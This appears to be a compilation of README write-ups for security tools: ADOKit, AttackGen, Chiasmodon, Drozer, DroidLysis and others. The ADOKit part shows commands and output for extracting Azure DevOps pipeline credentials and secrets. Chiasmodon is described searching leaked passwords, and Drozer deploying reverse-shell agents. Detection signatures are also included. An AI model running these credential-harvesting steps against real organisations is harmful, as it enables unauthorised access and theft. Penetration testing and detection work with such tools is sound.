4/5/23 15:21:44 Finished execution of removecollectionsvc

Get Pipeline Variables

Use Case

Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

Syntax

Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects, specify all in the /project: argument.

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/6/2023 12:08:35 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/

4/6/23 16:08:36 Finished execution of getpipelinevars
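
For context, what this module automates can be approximated with a couple of direct calls to the Azure DevOps REST API (referenced at the end of this write-up). Below is a minimal Python sketch, not ADOKit's actual code: it lists the build definitions of a project and prints their non-secret variables. The organization, project and PAT values are placeholders.

import requests

ORG, PROJECT, PAT = "YourOrganization", "maraudersmap", "apiKey"  # placeholders
base = f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/build/definitions"
auth = ("", PAT)  # Azure DevOps accepts a PAT as the basic-auth password with an empty username

# List pipeline definitions, then fetch each one to read its variables.
definitions = requests.get(base, params={"api-version": "7.1"}, auth=auth).json()
for d in definitions.get("value", []):
    full = requests.get(f"{base}/{d['id']}", params={"api-version": "7.1"}, auth=auth).json()
    for name, var in (full.get("variables") or {}).items():
        # Secret variables are returned without a value; plain ones expose it.
        print(name, "|", var.get("value", "[HIDDEN]"))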

Get Pipeline Secrets

Use Case

Extract the names of any pipeline secrets being used in project(s), which directs the operator where to attempt secret extraction.

Syntax

Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects, specify all in the /project: argument.

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/10/2023 10:28:37 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]

4/10/23 14:28:38 Finished execution of getpipelinesecrets

Get Service Connections

Use Case

List any service connections being used in project(s), which directs the operator where to attempt credential extraction for any service connections in use.

Syntax

Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used in all projects, specify all in the /project: argument.

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/11/2023 8:34:16 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

4/11/23 12:34:16 Finished execution of getserviceconnections
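
As with the other enumeration modules, the same data is exposed by the Azure DevOps REST API. A minimal Python sketch (placeholder organization, project and PAT; the preview API version shown is the one documented for the service endpoint API):

import requests

ORG, PROJECT, PAT = "YourOrganization", "maraudersmap", "apiKey"  # placeholders
url = f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/serviceendpoint/endpoints"

resp = requests.get(url, params={"api-version": "7.1-preview.4"}, auth=("", PAT)).json()
for ep in resp.get("value", []):
    # Mirrors the module's output columns: connection name, type and ID.
    print(ep.get("name"), "|", ep.get("type"), "|", ep.get("id"))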

Detection

Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
  • See ADOKit Yara Rule in this repo.
  • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
  • See ADOKit Snort Rule in this repo.
  • Microsoft Sentinel Rules
  • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
  • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
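
As an example of how the static User Agent signature can be operationalized, here is a minimal Python sketch that hunts for it in a web proxy log (the log path and format are hypothetical):

ADOKIT_UA = "ADOKit-21e233d4334f9703d1a3a42b6e2efd38"  # static signature listed above

# Hypothetical newline-delimited proxy log; adjust to your log source.
with open("proxy.log", encoding="utf-8", errors="replace") as log:
    for lineno, line in enumerate(log, start=1):
        if ADOKIT_UA in line:
            print(f"Possible ADOKit usage at line {lineno}: {line.rstrip()}")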

Roadmap

  • Support for Azure DevOps Server

References

  • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
  • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework


AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


Star the Repo

If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

Features

  • Generates unique incident response scenarios based on chosen threat actor groups.
  • Allows you to specify your organisation's size and industry for a tailored scenario.
  • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
  • Create custom scenarios based on a selection of ATT&CK techniques.
  • Capture user feedback on the quality of the generated scenarios.
  • Downloadable scenarios in Markdown format.
  • 🆕 Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
  • Available as a Docker container image for easy deployment.
  • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


Releases

v0.4 (current)

What's new, and why is it useful?
Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

v0.3

What's new, and why is it useful?
Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

- Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

- User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

v0.2

What's new, and why is it useful?
Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

- Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
Improved error handling for missing API keys - Improved user experience.
Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

v0.1

Initial release.

Requirements

  • Recent version of Python.
  • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
  • OpenAI API key.
  • LangChain API key (optional) - see LangSmith Setup section below for further details.
  • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

Installation

Option 1: Cloning the Repository

  1. Clone this repository:
git clone https://github.com/mrwadams/attackgen.git
  2. Change directory into the cloned repository:
cd attackgen
  3. Install the required Python packages:
pip install -r requirements.txt

Option 2: Using Docker

  1. Pull the Docker container image from Docker Hub:
docker pull mrwadams/attackgen

LangSmith Setup

If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.
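
For reference, a minimal .streamlit/secrets.toml can contain just the key below, left empty if you do not use LangSmith; check the secrets.toml-example file for the exact set of keys the app expects:

LANGCHAIN_API_KEY = ""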

Data Setup

Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Make sure to place this file in the ./data/ directory within the repository.

Running AttackGen

After the data setup, you can run AttackGen with the following command:

streamlit run 👋_Welcome.py

You can also try the app on Streamlit Community Cloud.

Usage

Running AttackGen

Option 1: Running the Streamlit App Locally

  1. Run the Streamlit app:
streamlit run 👋_Welcome.py
  2. Open your web browser and navigate to the URL provided by Streamlit.
  3. Use the app to generate standard or custom incident response scenarios (see below for details).

Option 2: Using the Docker Container Image

  1. Run the Docker container:
docker run -p 8501:8501 mrwadams/attackgen
This command will start the container and map port 8501 (the default for Streamlit apps) from the container to your host machine.
  2. Open your web browser and navigate to http://localhost:8501.
  3. Use the app to generate standard or custom incident response scenarios (see below for details).

Generating Scenarios

Standard Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisation's industry and size from the dropdown menus.
  4. Navigate to the Threat Group Scenarios page.
  5. Select the Threat Actor Group that you want to simulate.
  6. Click on 'Generate Scenario' to create the incident response scenario.
  7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Custom Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisation's industry and size from the dropdown menus.
  4. Navigate to the Custom Scenario page.
  5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
  6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
  7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

Contributing

I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

Licence

This project is licensed under GNU GPLv3.



Chiasmodon - An OSINT Tool Designed To Assist In The Process Of Gathering Information About A Target Domain


Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about a target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. The tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.


✨Features

  • [x] 🌐Domain: Conduct targeted searches by specifying a domain name to gather relevant information related to the domain.
  • [x] 🎮Google Play Application: Search for information related to a specific application on the Google Play Store by providing the application ID.
  • [x] 🔎CIDR and 🔢ASN: Explore CIDR blocks and Autonomous System Numbers (ASNs) associated with the target domain to gain insights into network infrastructure and potential vulnerabilities.
  • [x] ✉️Email, 👤Username, 🔒Password: Conduct searches based on email, username, or password to identify potential security risks or compromised credentials.
  • [x] 📋Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
  • [x] ⚙️Additional Options: The tool offers various additional options, such as viewing different result types (credentials, URLs, subdomains, emails, passwords, usernames, or applications), setting API tokens, specifying timeouts, limiting results, and more.

🚀Coming soon

  • 📱Phone: Get ready to uncover even more valuable data by searching for information associated with phone numbers. Whether you're investigating a particular individual or looking for connections between phone numbers and other entities, this new feature will provide you with valuable insights.

  • 🏢Company Name: We understand the importance of comprehensive company research. In our upcoming release, you'll be able to search by company name and access a wide range of documents associated with that company. This feature will provide you with a convenient and efficient way to gather crucial information, such as legal documents, financial reports, and other relevant records.

  • 👤Face (Photo): Visual data is a powerful tool, and we are excited to introduce our advanced facial recognition feature. With "Search by Face (Photo)," you can upload an image containing a face and leverage cutting-edge technology to identify and match individuals across various data sources. This will allow you to gather valuable information, such as social media profiles, online presence, and potential connections, all through the power of facial recognition.

Why Chiasmodon name ?

Chiasmodon niger is a species of deep sea fish in the family Chiasmodontidae. It is known for its ability to swallow fish larger than itself, and so do we. 😉


🔑 Subscription

Join us today and unlock the potential of our cutting-edge OSINT tool. Contact https://t.me/Chiasmod0n on Telegram to subscribe and start harnessing the power of Chiasmodon for your domain investigations.

⬇️Install

pip install chiasmodon

💻Usage

Chiasmodon provides a flexible and user-friendly command-line interface and python library. Here are some examples to demonstrate its usage:

How to use pychiasmodon library:

from pychiasmodon import Chiasmodon as ch 
token = "PUT_HERE_YOUR_API_KEY"
obj = ch(token)
  • Searching for a target domain and its subdomains:

    • Command line:
chiasmodon_cli.py --domain example.com --all
    • Python:
result = obj.search('example.com', method='domain', all=True)
for i in result:
    print(i)

  • Searching for a target domain only (results for "example.com" itself):

    • Command line:
chiasmodon_cli.py --domain example.com
    • Python:
result = obj.search('example.com', method='domain')
for i in result:
    print(i)

  • Searching for a target application ID on the Google Play Store:

    • Command line:
chiasmodon_cli.py --app com.discord
    • Python:
result = obj.search('com.discord', method='app')
for i in result:
    print(i)

  • Searching for a target ASN:

    • Command line:
chiasmodon_cli.py --asn AS123 --view-type cred
    • Python:
result = obj.search('AS123', method='asn', view_type='cred')
for i in result:
    print(i)

  • Searching for a target username:

    • Command line:
chiasmodon_cli.py --username someone
    • Python:
result = obj.search('someone', method='username')
for i in result:
    print(i)

  • Searching for a target password:

    • Command line:
chiasmodon_cli.py --password example@123
    • Python:
result = obj.search('example@123', method='password')
for i in result:
    print(i)

  • Searching for a target CIDR:

    • Command line:
chiasmodon_cli.py --cidr x.x.x.x/24
    • Python:
result = obj.search('x.x.x.x/24', method='cidr')
for i in result:
    print(i)

  • Searching for target credentials by domain emails:

    • Command line:
chiasmodon_cli.py --domain example.com --domain-emails
    • Python:
result = obj.search('example.com', method='domain', only_domain_emails=True)
for i in result:
    print(i)

  • All methods and view types:

    Methods | View Type
    --domain, --email, --cidr, --app, --asn, --username, --password | --view-type cred
    --cidr, --asn, --email, --username, --password | --view-type app
    --domain, --email, --cidr, --asn, --username, --password | --view-type url
    --domain | --view-type subdomain
    --domain, --cidr, --asn, --app | --view-type email
    --domain, --cidr, --app, --asn, --email, --password | --view-type username
    --domain, --cidr, --app, --asn, --email, --username | --view-type password

Please note that these examples represent only a fraction of the available options and use cases. Refer to the documentation for more detailed instructions and explore the full range of features provided by Chiasmodon.
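
If you want to keep results rather than just print them, the library calls shown above compose easily with standard Python. A minimal sketch (it assumes each result item can be serialised with str()):

import json
from pychiasmodon import Chiasmodon as ch

obj = ch("PUT_HERE_YOUR_API_KEY")

# Collect results for a domain and save them as JSON.
results = [str(i) for i in obj.search('example.com', method='domain')]
with open('example.com-results.json', 'w') as f:
    json.dump(results, f, indent=2)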

💬 Contributions and Feedback

Contributions and feedback are welcome! If you encounter any issues or have suggestions for improvements, please submit them to the Chiasmodon GitHub repository. Your input will help us enhance the tool and make it more effective for the OSINT community.

📜License

Chiasmodon is released under the MIT License. See the LICENSE file for more details.

⚠️Disclaimer

Chiasmodon is intended for legal and authorized use only. Users are responsible for ensuring compliance with applicable laws and regulations when using the tool. The developers of Chiasmodon disclaim any responsibility for the misuse or illegal use of the tool.

📢Acknowledgments

Chiasmodon is the result of collaborative efforts from a dedicated team of contributors who believe in the power of OSINT. We would like to express our gratitude to the open-source community for their valuable contributions and support.



ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices


ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


~ Hilali Abdel

USAGE

python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

[Add new Device]

python3 smartthings.py -a 192.168.1.1

python3 smartthings.py -s --type TPLINK

python3 smartthings.py -s --firmware "TP-Link Archer C7v2"

Search for CVE and PoC [firmware and device type]


Scan device for open UPnP ports

python3 smartthings.py -s --scan upnp --id

Get data from MQTT 'subscribe'

python3 smartthings.py -s --scan mqtt --id



VolWeb - A Centralized And Enhanced Memory Analysis Platform


VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


Objective

The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

Project Documentation and Getting Started Guide

The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

[!IMPORTANT] Take time to read the documentation in order to avoid common misconfiguration issues.

Interacting with the REST API

VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.
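
The endpoint below is purely hypothetical, named only to illustrate the general shape of scripting against a token-authenticated REST API like VolWeb's; consult the project wiki and the VolWeb-Scripts repository for the real routes.

import requests

BASE = "https://volweb.example"  # hypothetical VolWeb instance
TOKEN = "REPLACE_ME"             # hypothetical API token

# Hypothetical route; see the wiki for the actual API calls.
resp = requests.get(f"{BASE}/api/evidences/", headers={"Authorization": f"Token {TOKEN}"})
for evidence in resp.json():
    print(evidence)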

Issues

If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.

Contact

Contact me at [email protected] for any questions regarding this tool.

Next Release Goals

Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1



Drozer - The Leading Security Assessment Framework For Android


drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of leaving certain components exported on a device.

drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


Docker Container

To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

  • The Docker container and basic setup instructions can be found here.
  • Instructions on building your own Docker container can be found here.

Manual Building and Installation

Prerequisites

  1. Python 2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

  2. Protobuf 2.6 or greater

  3. Pyopenssl 16.2 or greater

  4. Twisted 10.2 or greater

  5. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

  6. Android Debug Bridge

Building Python wheel

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install dist/drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -i drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

Usage

Installing the Agent

Drozer can be installed using Android Debug Bridge (adb).

Download the latest Drozer Agent here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server 192.168.0.10

On Windows:

> drozer.bat console connect --server 192.168.0.10

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.
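
For instance, a session often starts by enumerating installed packages with one of drozer's built-in modules:

dz> run app.package.list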

Command Reference

Command | Description
run | Executes a drozer module
list | Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell | Start an interactive Linux shell on the device, in the context of the Agent process.
cd | Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean | Remove temporary files stored by drozer on the Android device.
contributors | Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo | Print text to the console.
exit | Terminate the drozer session.
help | Display help about a particular command or module.
load | Load a file containing drozer commands, and execute them in sequence.
module | Find and install additional drozer modules from the Internet.
permissions | Display a list of the permissions granted to the drozer Agent.
set | Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset | Remove a named variable that drozer passes to any Linux shells that it spawns.

License

drozer is released under a 3-clause BSD License. See LICENSE for full details.

Contacting the Project

drozer is Open Source software, made great by contributions from the community.

Bug reports, feature requests, comments and questions can be submitted here.



DroidLysis - Property Extractor For Android Apps


DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


Installing DroidLysis

  1. Install required system packages:
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
  2. Install Android disassembly tools:
    • Apktool,
    • Baksmali, and optionally
    • Dex2jar and
    • Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
  3. Get DroidLysis from the Git repository (preferred) or from pip.

Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis

Alternatively, you can install DroidLysis directly from PyPI (pip3 install droidlysis).

  4. Configure conf/general.conf. In particular, make sure to replace /home/axelle with your appropriate directories.
[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
  5. Run it:
python3 ./droidlysis3.py --help

Configuration

The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the names of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql).

Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

Usage

DroidLysis uses Python 3. To launch it and get options:

droidlysis --help

For example, test it on Signal's APK:

droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

DroidLysis outputs:

  • A summary on the console (see image above)
  • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
  • A database (by default, SQLite droidlysis.db) containing properties it noticed.

Options

Get usage with droidlysis --help

  • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.

  • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here).

  • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

  • DroidLysis's analysis does not inspect known 3rd party SDKs by default, i.e. it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisement) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

Sample output directory (--output DIR)

This directory contains (when applicable):

  • A readable AndroidManifest.xml
  • Readable resources in res
